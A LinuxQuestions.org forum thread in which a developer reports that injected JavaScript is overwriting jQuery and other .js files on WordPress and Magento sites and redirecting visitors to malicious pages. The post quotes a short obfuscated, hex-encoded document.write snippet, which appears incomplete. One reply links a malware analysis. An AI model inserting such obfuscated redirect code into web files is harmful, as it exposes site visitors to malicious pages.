LinuxQuestions.org
Visit Jeremy's Blog.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 11-09-2017, 04:03 PM   #1
taru.tarak
Member
 
Registered: Aug 2016
Distribution: CentOS
Posts: 91

Rep: Reputation: Disabled
Facing issue with 'jQuery Malware' and 'JS Malware' virus attack


Hello Everyone,


We have a website development server and server basic information as below:

==========================

OS: CentOS 6.9

PHP: 7.1

MySQL: 5.6

Apache: 2.2

Document root: /var/www/html

Sample project URL: http://dev.domain.com/project

==========================

Recently we have noticed that one kind of virus basically attacking the .js extension files ( primarily targets the jQuery.js file) on the server and spreading / replacing a few line of code that is redirecting the user, when visiting the development project URL ( sample URL is mentioned in above) to a malicious pages. Below virus code usually they look like:

==========================

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

==========================


The above code are replacing with actual code of our .js extension files. This are happening with basically maximum numbers of WordPress sites. But it's also happening with Magento sites as well.

Requesting all of you, please let me know how we can solve it permanently?


Please please help us as there are so many projects which we are developing right now for our clients. And we have to deliver.


Any suggestions would be appreciated.


Regards,

Tarak Nath
 
Old 11-09-2017, 05:14 PM   #2
dugan
LQ Guru
 
Registered: Nov 2003
Location: Canada
Distribution: distro hopper
Posts: 11,249

Rep: Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323Reputation: 5323
At this point, I personally can't make a recommendation more specific than "improve your security so that you stopped getting hacked." I think you already know that.

This is some information on the malware that I think you were hit with:

https://malwarebreakdown.com/2017/04...ing-campaigns/

Last edited by dugan; 11-09-2017 at 05:18 PM.
 
Old 11-09-2017, 11:18 PM   #3
taru.tarak
Member
 
Registered: Aug 2016
Distribution: CentOS
Posts: 91

Original Poster
Rep: Reputation: Disabled
Facing issue with 'jQuery Malware' and 'JS Malware' virus attack

Thank you sir
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] Security: Virus/Malware/Attack defense PeterW2 Slackware 32 04-11-2016 05:44 PM
[SOLVED] May have contracted malware. Yes, malware. Firefox on Ubuntu Fiesty. Seeking a fix drachenchen Linux - Security 22 08-17-2008 01:05 PM
May have contracted malware. Yes, malware. Firefox on Ubuntu Fiesty. Seeking a fix drachenchen Linux - Security 1 06-12-2008 05:10 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 10:43 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration